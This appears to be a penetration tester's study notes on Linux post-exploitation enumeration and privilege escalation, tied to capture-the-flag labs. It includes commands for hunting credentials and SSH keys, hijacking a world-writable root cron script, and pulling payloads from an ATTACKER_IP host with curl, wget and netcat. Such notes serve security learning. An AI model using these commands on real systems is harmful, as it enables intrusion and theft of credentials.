Linux Enumeration

Table of Contents

• Linux Enumeration
  • Table of Contents
  • Subdirectories
  • Overview
  • System Information
  • User and Group Enumeration
  • Sudo and Privilege Checks
  • SUID and SGID Binaries
    • What to Look For with SUID and SGID Search Results
  • Scheduled Jobs (Cron)
    • What to Look For
  • World-Writable Files and Directories
  • File System Enumeration
  • Environment Variables
    • What to Look For With Environment Variables
  • Credential Hunting
  • Network Information
  • Transferring Files Between Hosts
    • HTTP Server (Python)
    • SCP (Secure Copy)
    • Netcat
  • References
    • Challenges
    • Web Sites

---

Subdirectories

Directory	Description
ssh-brute-force/	Gaining SSH access via credential brute-forcing with Hydra
suid-path-hijack/	Privilege escalation via SUID binaries calling commands without absolute paths
rce/	Remote code execution via vulnerable services and file processing pipelines

---

Overview

Post-exploitation enumeration commands for Linux systems. The goal is to systematically gather information about the system, users, running services, file permissions, and scheduled tasks to identify potential privilege escalation paths.

---

System Information

# Hostname
hostname

# OS and kernel version
uname -a
cat /etc/os-release

# Current user and identity
whoami
id

# All logged-in users
who
w

# Recently logged-in users
last
lastlog

---

User and Group Enumeration

# List all users
cat /etc/passwd

# List all groups
cat /etc/group

# Current user's group memberships
groups
id

---

Sudo and Privilege Checks

Always check sudo privileges first. It is the quickest path to root if misconfigured.

# Check what the current user can run with sudo
sudo -l

# Check sudo version (may be vulnerable)
sudo --version

If sudo -l returns nothing useful or is denied, move on to SUID binaries and cron jobs.

Note

In restricted shell environments, sudo may be overridden. Check /etc/profile and environment setup files to understand what commands are actually available and whether standard tools have been replaced or restricted. See Environment Variables below.

---

SUID and SGID Binaries

SUID (Set User ID) binaries execute with the permissions of the file owner (usually root) regardless of who runs them.

SGID (Set Group ID) binaries execute with the permissions of the file's group.

Both are common privilege escalation vectors.

# Find all SUID binaries
find / -perm /4000 -ls 2>/dev/null

# Find all SGID binaries
find / -perm /2000 -ls 2>/dev/null

# Find all SUID and SGID binaries combined
find / -perm /6000 -ls 2>/dev/null

# Simpler output: paths to regular files only, no permission errors
find / -perm -4000 -type f 2>/dev/null

What to Look For with SUID and SGID Search Results

Compare output against the standard set of SUID binaries (passwd, sudo, mount, su, etc.). Any non-standard binary is worth investigating, especially those in /usr/local/bin/ or /opt/.

When you find a suspicious SUID binary:

# Identify file type — script or ELF binary?
file /path/to/binary

# Look for embedded commands called without absolute paths
strings /path/to/binary | grep -E "^[a-z]{2,10}$"

A binary that calls a command without an absolute path (e.g., ls -l %s instead of /bin/ls -l %s) is vulnerable to PATH hijacking. See suid-path-hijack/ for the full technique.

Also look for non-standard SUID binaries that wrap legitimate tools. For example, a custom mm binary with SUID set that internally calls less. The less binary itself may have exploitable CVEs that, combined with SUID execution, allow privilege escalation via environment variables like LESSOPEN or LESSCLOSE. See rce/ for an example of this technique.

---

Scheduled Jobs (Cron)

Cron jobs running as root that reference world-writable scripts are a reliable privilege escalation path.

# System-wide crontab
cat /etc/crontab

# Per-user crontabs
crontab -l

# Cron job directories
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/

What to Look For

In /etc/crontab, identify jobs running as root and check whether the script they call is writable by the current user:

# Check permissions on a cron script
ls -la /opt/security-sweep

# If world-writable, append a command to execute as root
echo 'cat /root/token.txt >> /tmp/token' >> /opt/security-sweep

# Wait for the cron job to execute, then read the output
cat /tmp/token

Alternatively, use scp to overwrite the script with a new version from your host:

# Transfer a modified script to a world-writable cron target
scp -O modified-script user@TARGET:/opt/security-sweep

Note

Use the -O flag with scp to force the legacy SCP protocol if the default SFTP transfer fails.

---

World-Writable Files and Directories

# World-writable directories
find / -xdev -type d -perm -0002 -ls 2>/dev/null

# World-writable files
find / -xdev -type f -perm -0002 -ls 2>/dev/null

Cross-reference world-writable files against cron jobs and SUID binaries. A world-writable script called by a root cron job or SUID binary is an immediate escalation path.

Common world-writable locations to note include /tmp, /var/tmp, /run/lock, and are safe to use for staging payloads.

---

File System Enumeration

# Files in the current directory (verbose)
find . -ls

# Files in the user's home directory
ls -asl ~

# Files under /opt (often contains custom apps and scripts)
find /opt -ls 2>/dev/null

# Find files owned by root but readable by current user
find / -user root -readable -type f 2>/dev/null

# Find recently modified files
find / -mmin -10 -type f 2>/dev/null

# Find files with specific name patterns
find / -name "token*" -type f 2>/dev/null
find / -name "*.txt" -readable -type f 2>/dev/null

---

Environment Variables

Environment variables can reveal sensitive information and exploitation opportunities, particularly when SUID binaries or tools like less are involved.

# Print all environment variables
env
printenv

# Check profile and shell configuration files
cat /etc/profile
cat ~/.bashrc
cat ~/.bash_profile
cat ~/.profile

What to Look For With Environment Variables

• Restricted PATH: a limited PATH in /etc/profile signals a restricted shell environment. Check which commands are symlinked or available.
• LESSOPEN / LESSCLOSE: if set, and less (or a SUID binary wrapping it) is available, these can be exploited for command injection via CVE-2024-32487 or CVE-2022-48624.
• Hardcoded credentials: API keys, passwords, or tokens occasionally appear in environment variables set by poorly configured applications.

---

Credential Hunting

# Search for passwords in config files
grep -r "password" /etc/ 2>/dev/null
grep -r "passwd" /home/ 2>/dev/null

# Check bash history
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null

# Search for SSH private keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find / -name "*.pem" 2>/dev/null

# Check SSH config for known hosts and keys
cat ~/.ssh/config 2>/dev/null
cat ~/.ssh/known_hosts 2>/dev/null

# Check for stored credentials
cat ~/.netrc 2>/dev/null

---

Network Information

# Network interfaces and IP addresses
ip a
ifconfig

# Routing table
ip route
netstat -rn

# Active connections and listening ports
ss -tulnp
netstat -tulnp

# Hosts file — may reveal internal hostnames
cat /etc/hosts

# DNS configuration
cat /etc/resolv.conf

Tip

Services may be listening on non-standard ports not visible to an external Nmap scan. Check internally with ss -tulnp to find ports that are only accessible from within the host or local network. Always supplement external scanning with a full port scan (nmap -p-) to catch services on high port numbers.

Tip

If port 22 is open and you have a suspected username, SSH brute-forcing is worth attempting before deeper enumeration. See ssh-brute-force/ for the full technique using Hydra.

---

Transferring Files Between Hosts

HTTP Server (Python)

Useful for pulling files from your attack host onto a compromised target.

# On the attack host — serve files from current directory
sudo python3 -m http.server 80

# On the target — download a file
curl http://ATTACKER_IP/file.ext -o file.ext
wget http://ATTACKER_IP/file.ext

SCP (Secure Copy)

# Push a file from attack host to target
scp -O localfile user@TARGET:/remote/path/

# Pull a file from target to attack host
scp -O user@TARGET:/remote/path/file .

Note

Use -O to force the legacy SCP protocol if the default SFTP mode fails.

Netcat

# On the receiving end
nc -lvnp 4444 > received_file

# On the sending end
nc RECEIVER_IP 4444 < file_to_send

---

References

Challenges

Source	Name
Immersive Labs: Haunted Hollow	Lab 9 - Mirrored Mayhem
Immersive Labs: Return to Haunted Hollow	Lab 6 - Haunted Helpdesk
Holiday Hack Challenge 2024, Act I	Hardware Part II

Web Sites

• HackTricks - Linux Privilege Escalation
• PayloadsAllTheThings - Linux Privilege Escalation
• LinPEAS — Linux Privilege Escalation Awesome Scripts
• GTFOBins — SUID/SGID Binary Exploitation
• CVE-2024-32487 — less LESSOPEN injection
• CVE-2022-48624 — less LESSCLOSE injection